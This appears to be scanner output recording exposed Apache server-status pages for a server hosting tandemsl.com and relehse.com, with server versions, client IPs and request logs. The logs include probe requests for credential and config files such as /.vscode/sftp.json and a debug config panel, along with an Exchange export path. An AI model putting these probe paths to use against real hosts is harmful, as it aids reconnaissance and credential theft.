1.72361012990.01.351.35 80.29.212.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-08480/18/18_ 2.3982604660.00.140.14 177.244.48.54h2tandemsl.com:443idle, streams: 0/56/56/0/0 (open/recv/resp/push/rst) 3-08480/3/3_ 2.381030.00.240.24 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-08480/10/10_ 2.3982602900.00.100.10 177.244.48.54h2tandemsl.com:443idle, streams: 0/57/57/0/0 (open/recv/resp/push/rst) 3-08480/21/21_ 2.72007880.00.240.24 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-08480/8/8_ 2.3682403230.00.190.19 177.244.48.54h2tandemsl.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 3-08480/20/20_ 2.3982601380.00.230.23 177.244.48.54h2tandemsl.com:443idle, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 3-08480/9/9_ 2.3901743620.00.410.41 177.244.48.54h2tandemsl.com:443idle, streams: 0/50/50/0/0 (open/recv/resp/push/rst) 4-012020/147/147_ 4.535811540440.01.111.11 178.20.55.16http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-012020/121/121_ 4.520173255870.01.741.74 178.20.55.16http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 4-012020/115/115_ 4.381056460.03.393.39 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-012020/97/97_ 4.511040130.01.141.14 178.62.73.12http/1.1 4-012020/74/74_ 4.381028400.00.670.67 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-012020/75/75_ 4.550053480.00.830.83 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-012020/81/81_ 4.550035290.00.970.97 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-012020/78/78_ 4.4500174080.01.291.29 178.62.73.12http/1.1 4-012020/226/226_ 4.4058091260.03.433.43 80.29.212.67h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-012020/64/64_ 4.5058343090.01.831.83 52.167.144.90h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802fbe685cc
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 10-Jun-2023 00:09:43 CEST Restart Time: Wednesday, 31-May-2023 12:21:46 CEST Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 9 days 11 hours 47 minutes 56 seconds Server load: 0.02 0.03 0.00 Total accesses: 501302 - Total Traffic: 9.2 GB - Total Duration: 53213629 CPU Usage: u618.77 s467.27 cu1145.55 cs686.61 - .356% CPU load .611 requests/sec - 11.7 kB/second - 19.2 kB/request - 106.151 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01009569no0yes010000 11245963no0yes19000 21167933no0yes010000 31009570no0yes010000 41009571no0yes010000 Sum500 149000 _____________W____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-210095690/2850/3853_ 283.42504100760.050.3664.77 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-210095690/3336/4645_ 283.42503736060.045.8161.42 189.201.142.121h2tandemsl.com:443idle, streams: 0/61/61/0/0 (open/recv/resp/push/rst) 0-210095690/3034/4115_ 283.42403620020.039.7754.35 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-210095690/3170/4153_ 283.41303324390.046.6779.48 162.243.184.251http/1.1 0-210095690/2749/3556_ 283.49523794390.053.2866.33 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-210095690/3014/3988_ 283.46702893792580.043.1768.09 138.246.253.24http/1.1tandemsl.com:443GET /robots.txt HTTP/1.1 0-210095690/2924/3985_ 283.417003610580.060.9278.25 138.246.253.24http/1.1 0-210095690/3483/4399_ 283.423011732750.049.7663.58 162.243.184.251http/1.1 0-210095690/2752/3766_ 283.419504557950.043.4558.60 189.201.142.121h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-210095690/3548/4811_ 283.41303936740.061.6975.34 162.243.184.251http/1.1 1-212459630/1066/22367_ 50.991218772930.029.84408.24 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-212459630/1176/22077_ 50.560016752210.016.70394.19 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-212459630/1093/21428_ 50.921220534570.020.87420.33 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1686348512.70611596107482910156 1-212459630/962/21184W 50.700016829620.021.51412.18 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-212459630/1117/21842_ 50.98079717479010.022.95424.91 193.186.4.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-212459630/1152/20474_ 50.990022569990.020.56393.58 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-212459630/751/20348_ 50.991016872280.016.41398.51 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-212459630/1160/21891_ 50.991019287770.033.06400.68 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-212459630/1010/20844_ 50.990017563520.024.95406.80 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-212459630/1115/21326_ 51.000018364580.026.10409.02 162.243.184.251http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-211679330/4477/13580_ 201.6048397412604090.080.88218.68 46.60.84.0http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x03 2-211679330/4376/13274_ 200.13156011689500.087.64260.00 200.91.252.231h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-211679330/4533/13386_ 201.94483211088050.0100.05267.62 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1686348099.53803396224975585937 2-211679330/4051/13517_ 200.3012091914639150.083.66263.78 189.197.128.45h2done, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 2-211679330/3969/12424_ 202.147212302640.079.60259.96 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1686348575.44545602798461914062 2-211679330/4085/13370_ 202.081563220461750.090.85271.89 51.178.207.154h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-211679330/3984/12812_ 200.127010489250.0101.67281.85 185.66.41.165http/1.1 2-211679330/4127/12784_ 201.86123011183630.098.89265.25 181.51.33.74h2tandemsl.com:443idle, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 2-211679330/3745/12214_ 200.30120010354540.0103.52263.84 179.7.98.123h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-211679330/4452/13631_ 202.09123036318190.090.66271.58 189.201.142.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-210095700/2019/2762_ 262.6424422442957110.051.2360.32 186.154.37.222h2tandemsl.com:443idle, streams: 0/26/26/0/0 (open/recv/resp/push/rst) 3-210095700/2100/2925_ 262.51207923013980.034.9745.37 177.241.44.115h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-210095700/2102/2980_ 262.65244203354900.047.7558.16 186.154.37.222h2tandemsl.com:443idle, streams: 0/32/32/0/0 (open/recv/resp/push/rst) 3-210095700/2071/2785_ 262.50243703521940.044.5957.38 66.249.66.35http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min 3-210095700/2148/2786_ 262.65244003066680.033.9345.30 186.154.37.222h2tandemsl.com:443idle, streams: 0/33/33/0/0 (open/recv/resp/push/rst) 3-210095700/2077/2787_ 261.50403553490.045.6468.27 162.243.184.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-210095700/2293/2985_ 262.6414802830110.036.5045.26 177.234.197.213h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-210095700/2437/3330_ 262.648803112790.054.9767.46 186.154.37.222h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-210095700/2222/2939_ 262.50243703316510.037.9547.81 66.249.66.35http/1.1tandemsl.com:443done, streams: 0/33/33/0/0 (open/recv/resp/push/rst) 3-210095700/2024/2805_ 261.15119423346150.050.8163.55 200.91.252.231h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-210095710/1131/8454_ 226.71116407628550.018.48151.04 186.84.90.129h2tandemsl.com:443idle, streams: 0/56/56/0/0 (open/recv/resp/push/rst) 4-210095710/973/8282_ 226.7011662116361990.019.50163.66 186.84.90.129h2tandemsl.com:443idle, streams: 0/49/49/0/0 (open/recv/resp/push/rst) 4-210095710/954/8788_ 226.69102307467840.016.86133.13 66.249.93.67http/1.1 4-210095710/1392/8877_ 226.66116106427360.016.54151.49 186.84.90.129h2tandemsl.com:443done, streams: 0/56/56/0/0 (open/recv/resp/push/rst) 4-210095710/1219/8636_ 226.75103209548440.016.67123.29 66.249.93.5http/1.1tandemsl.com:443GET /wp-content/plugins/sitepress-multilingual-cms/res/flags/es 4-210095710/1081/8561_ 226.661160010388150.020.51148.56 186.84.90.129h2tandemsl.com:443idle, streams: 0/21/21/0/0 (open/recv/resp/push/rst) 4-210095710/128
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a8580212b3c9d6
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 23-May-2023 00:41:33 CEST Restart Time: Saturday, 13-May-2023 22:34:26 CEST Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 9 days 2 hours 7 minutes 6 seconds Server load: 0.14 0.03 0.01 Total accesses: 1518881 - Total Traffic: 19.9 GB - Total Duration: 59596542 CPU Usage: u380.8 s241.7 cu3392.82 cs1182.55 - .662% CPU load 1.93 requests/sec - 26.6 kB/second - 13.8 kB/request - 39.2371 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0335716no1yes010001 1335719no1yes010100 2335933no0yes010000 3335718no0yes19000 4335717no0yes010000 Sum502 149101 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-23357160/3591/6189_ 182.6617447460420.061.67101.43 165.227.146.2http/1.1 0-23357160/3880/6608_ 182.68907165750.075.73123.61 66.249.70.169http/1.1tandemsl.com:443GET /wp-includes/css/classic-themes.min.css?ver=6.2.2 HTTP/1.1 0-23357160/4003/6636_ 182.22006890290.081.51124.95 177.226.131.150h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-23357160/3322/6004_ 182.561106283400.077.01137.92 95.108.213.231http/1.1tandemsl.com:80done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-23357160/3923/6723_ 182.58506119370.076.25129.01 66.249.70.169http/1.1 0-23357160/3700/6249_ 182.6702996665140.078.24123.97 66.249.70.169http/1.1tandemsl.com:443GET /blog/ HTTP/1.1 0-23357160/3581/6552_ 182.69007285430.082.73133.87 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-23357160/3336/6267_ 182.68706380590.089.50143.72 66.249.70.169http/1.1tandemsl.com:443GET /wp-content/themes/metro-pro/js/scripts_new_tandem.js?ver=6 0-23357160/3719/6321_ 182.6421496656090.085.91133.50 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-23357160/3353/6000_ 182.62126425830.067.37120.80 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-23357190/2441/89317_ 140.280118737340.048.671017.55 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-23357190/2523/88747_ 140.310019337650.058.321012.73 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-23357190/2286/88952_ 140.310019121690.035.461009.48 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-23357190/2657/88840_ 140.32075119489180.052.171024.15 5.45.207.171http/1.1tandemsl.com:443GET / HTTP/1.1 1-23357190/2500/88189_ 140.290218723160.052.571008.94 66.249.70.167http/1.1tandemsl.com:443GET /wp-includes/css/dashicons.min.css?ver=6.2.2 HTTP/1.1 1-23357190/2746/89539_ 140.28118519249320.053.711036.02 165.227.146.2http/1.1 1-23357190/2303/88876_ 140.310020789310.047.311031.61 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-23357190/2573/88665_ 140.310122068220.048.541042.38 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-23357190/2747/90107_ 140.251019738280.054.171035.06 165.227.146.2http/1.1 1-23357190/2548/89499_ 140.191219211970.048.411010.67 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-23359330/1380/28935_ 93.3140409002070.019.97340.04 42.236.10.93h2tandemsl.com:443idle, streams: 0/62/62/0/0 (open/recv/resp/push/rst) 2-23359330/1482/29119_ 93.3340208609580.024.26354.99 42.236.10.93h2tandemsl.com:443idle, streams: 0/66/66/0/0 (open/recv/resp/push/rst) 2-23359330/1555/28660_ 93.0836008446960.031.83347.97 27.115.124.6http/1.1 2-23359330/1560/29153_ 93.0839909474990.028.51341.01 66.249.80.106http/1.1 2-23359330/1495/28932_ 93.441317588401210.026.23385.86 167.248.133.189http/1.1tandemsl.com:443GET / HTTP/1.1 2-23359330/1542/28941_ 93.0839908804010.030.27343.14 66.249.84.223http/1.1done, streams: 0/68/68/0/0 (open/recv/resp/push/rst) 2-23359330/1529/28774_ 93.0913109180150.026.09337.98 167.248.133.189http/1.1 2-23359330/1509/29284_ 93.2740518774630.029.62376.81 42.236.10.93h2tandemsl.com:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 2-23359330/1348/28486_ 93.3340208537930.035.22368.32 42.236.10.93h2tandemsl.com:443idle, streams: 0/68/68/0/0 (open/recv/resp/push/rst) 2-23359330/1457/29248_ 93.0636008654990.034.65370.38 66.249.80.109http/1.1 3-23357180/783/17932_ 81.2461385414157790.015.02346.88 74.125.151.169http/1.1tandemsl.com:443GET /?gclid=EAIaIQobChMIuO36nPOJ_wIVidDeCh2G3Ak-EAEYASAAEgIBKfD 3-23357180/769/18218W 81.130018084690.017.46373.73 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-23357180/747/16954_ 81.12610013348380.012.86331.57 74.125.151.169http/1.1 3-23357180/832/18532_ 81.1546015129240.014.97380.90 66.249.80.111http/1.1tandemsl.com:443GET /wp-content/uploads/2020/02/Herramienta-CLP-300x201.png HTT 3-23357180/797/18752_ 81.131314786780.018.02384.12 165.227.146.2http/1.1 3-23357180/869/19120_ 81.14850014623290.010.50320.11 66.249.80.111http/1.1 3-23357180/842/18191_ 81.13368013907220.015.19366.70 1.192.192.8http/1.1 3-23357180/954/18755_ 81.474728713331390.014.56338.60 185.191.171.15http/1.1tandemsl.com:443GET /ingenieria-hse/apq/mie-apq-7-almacenamiento-de-liquidos-to 3-23357180/771/18160_ 81.14703115029110.011.63340.65 190.134.254.235h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-23357180/780/17842_ 81.1364319115212070.015.26347.28 66.249.80.109http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-23357170/462/9300_ 72.020010088790.04.25189.01 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-23357170/299/9574_ 71.69556010386140.07.74176.74 138.117.143.68h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-23357170/374/9785_ 71.6785019283870.03.16170.62 66.249.80.109http/1.1 4-23357170/353/8959_ 71.6939609696310.04.68169.86 42.236.10.93http/1.1 4-23357170/289/8821_ 71.6942408756600.06.59167.20 212.111.41.243http/1.1 4-23357170/357/9393_ 71.8442429505130.05.61201.04 212.111.41.243http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-23357170/429/9533_ 71.84424010106850.03.24203.77 212.111.41.243http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /favicon.ico HTTP/1.1 4-23357170/313/8779_ 71.69109347890.06.68164.87 165.227.146.2http/1.1 4-23357170/408/8904_ 71.6985308940120.04.35165.04 66.24
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802cd4d4430
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-May-2023 16:56:51 CEST Restart Time: Saturday, 13-May-2023 22:34:26 CEST Parent Server Config. Generation: 2 Parent Server MPM Generation: 1 Server uptime: 4 days 18 hours 22 minutes 24 seconds Server load: 0.14 0.14 0.18 Total accesses: 1310658 - Total Traffic: 15.6 GB - Total Duration: 36342151 CPU Usage: u2170.05 s637.53 cu714.62 cs284.76 - .925% CPU load 3.18 requests/sec - 39.8 kB/second - 12.5 kB/request - 27.7282 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 020957no2yes19000 1159817no0yes19000 220959no0yes010000 3179109no3yes010101 4196796no2yes010000 Sum507 248101 K______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1209571/1179/1239K 194.9501101197282.821.8422.45 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1209570/1293/1364_ 194.9031101590020.017.9718.36 159.89.83.196http/1.1 0-1209570/1261/1318_ 194.9046881480650.019.1920.20 2.136.78.3h2relehse.com:443idle, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 0-1209570/1236/1288_ 194.93491031082580.022.3423.63 2.136.78.3h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-1209570/1380/1438_ 194.8801051130580.025.4526.04 2.136.78.3h2relehse.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 0-1209570/1212/1262_ 194.903971233560.026.5426.93 159.89.83.196h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1209570/1487/1546_ 194.9046821565830.022.6524.63 2.136.78.3h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-1209570/1545/1592_ 194.880971364720.026.2826.51 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1209570/1225/1286_ 194.953351167000.020.5720.86 2.136.78.3h2pre.relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1209570/1182/1228_ 194.92501811262920.020.3420.68 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-11598170/78707/83231_ 1545.50275311700030.0781.31873.72 2.136.78.3h2pre.relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-11598170/77879/82297_ 1545.601012346930.0763.56860.34 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-11598170/78323/82839_ 1545.600011924470.0772.39885.46 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-11598170/78059/82431_ 1545.530112000610.0785.91879.29 103.23.61.80http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-11598170/77977/82463_ 1545.600011803700.0767.18875.17 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-11598170/78576/82994W 1545.340011878720.0779.30869.94 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-11598170/78987/83409_ 1545.5612412164610.0788.11898.05 185.73.170.221h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-11598170/78116/82299_ 1545.26214712396800.0791.35901.67 159.89.83.196http/1.1 1-11598170/79007/83453_ 1545.54272511690040.0781.77879.31 195.235.86.64h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-11598170/78788/83322_ 1545.592816911914720.0774.92879.48 115.133.214.111http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-1209590/25576/25579_ 700.71254175507340.0285.92285.93 195.235.86.64h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-1209590/25548/25552_ 700.69251644906010.0293.57293.59 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1209590/25012/25012_ 700.70105474735750.0280.09280.09 2.136.78.3h2relehse.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-1209590/25293/25295_ 700.402512065944350.0281.53281.54 115.133.214.111http/1.1tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-1209590/25297/25303_ 700.83105001650.0309.58309.60 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-1209590/25212/25214_ 699.98254335011420.0272.20272.21 185.238.48.9h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1209590/25172/25173_ 700.70105635637930.0276.79276.79 2.136.78.3h2relehse.com:443local goaway, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1209590/25560/25573_ 700.7710704969540.0315.24315.34 95.17.240.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1209590/25303/25312_ 700.703524955420.0295.75295.79 159.89.83.196h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-1209590/25809/25809_ 700.702595248230.0305.37305.37 159.89.83.196http/1.1 3-11791090/6837/14190_ 219.640010403950.0116.19261.22 148.255.205.139h2tandemsl.com:443idle, streams: 0/25/25/0/0 (open/recv/resp/push/rst) 3-11791090/6661/14484_ 219.652014552330.0108.81264.93 159.89.83.196h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-11791090/6311/13518_ 219.684229622400.098.04246.08 185.73.170.221h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-11791090/6727/14448_ 219.653715211615290.0120.98275.25 200.68.185.151h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-11791090/6788/15080_ 219.641010627040.0119.19275.11 148.255.205.139h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-11791090/6632/15148_ 219.690010807770.093.43244.52 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-11791090/6672/14185_ 219.65209828290.0103.23252.08 159.89.83.196h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-11791090/7245/15119_ 219.661309816170.095.49249.53 2.136.78.3h2pre.relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-11791090/6700/14191_ 219.5636010901840.0101.12249.40 159.89.83.196http/1.1 3-11791090/6530/14498_ 219.691011654600.0104.91272.99 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-11967960/2838/7150_ 118.89406954850.066.54150.09 159.89.83.196http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-11967960/3103/7487_ 118.8611197466860.061.68141.15 2.136.78.3h2relehse.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 4-11967960/3013/7393_ 118.900226952320.063.15141.55 95.62.94.67h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-11967960/2516/6524_ 118.8211027015620.051.89136.32 148.255.205.139h2done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-11967960/2662/6781_ 118.8831116493280.052.17124.89 159.89.83.196http/1.1 4-11967960/2729/6900_ 118.874246532130.074.10165.72 195.235.86.64h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-11967960/2879/7055_ 118
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858027a4b0e79
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Monday, 08-May-2023 17:56:25 CEST Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 58 Parent Server MPM Generation: 57 Server uptime: 120 days 21 hours 59 minutes 45 seconds Server load: 0.02 0.06 0.05 Total accesses: 6450085 - Total Traffic: 121.9 GB - Total Duration: 1064700830 CPU Usage: u533.07 s613.48 cu20802.7 cs13967.6 - .344% CPU load .617 requests/sec - 12.2 kB/second - 19.8 kB/request - 165.068 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03325935no3yes010002 13325795no0yes19000 23325794no1yes010000 33325792no2yes19001 43325793no0yes010000 Sum506 248003 __________W________________________K______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5733259350/3135/125868_ 126.187932175370930.055.522228.74 66.249.70.167http/1.1tandemsl.com:443GET /seguridad-industrial-blog/plan-de-autoproteccion-que-es/ H 0-5733259350/3306/123805_ 126.157344179949640.056.952345.24 159.223.50.175http/1.1 0-5733259350/2802/123825_ 126.1331207070210.057.562360.74 103.23.61.80http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5733259350/3156/121418_ 125.9830173962200.048.422358.93 159.223.50.175h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5733259350/2520/121087_ 126.0711264872300.048.112307.50 159.223.50.175h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5733259350/3106/121377_ 126.18632160175860.043.592245.01 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5733259350/3041/123654_ 126.170198187317920.046.812265.17 66.249.70.167http/1.1tandemsl.com:443GET /es/blog/plan-de-autoproteccion-que-es/ HTTP/1.1 0-5733259350/2565/124991_ 126.05827186617950.057.762392.60 159.223.50.175http/1.1 0-5733259350/2693/122848_ 126.1840370081310.057.962309.44 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-5733259350/2890/120752_ 125.9850198714250.061.212280.46 66.249.70.167http/1.1 1-5733257950/197/120776W 58.5700313001410.07.872489.24 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-5733257950/259/121289_ 58.631520274887450.04.272404.65 200.29.216.37h2tandemsl.com:443idle, streams: 0/56/56/0/0 (open/recv/resp/push/rst) 1-5733257950/267/121104_ 58.631500226034260.04.382567.30 200.29.216.37h2tandemsl.com:443idle, streams: 0/57/57/0/0 (open/recv/resp/push/rst) 1-5733257950/298/120251_ 58.591470210329610.03.462457.25 200.29.216.37h2tandemsl.com:443idle, streams: 0/30/30/0/0 (open/recv/resp/push/rst) 1-5733257950/353/120558_ 58.63890164132270.03.612567.58 200.29.216.37h2tandemsl.com:443idle, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 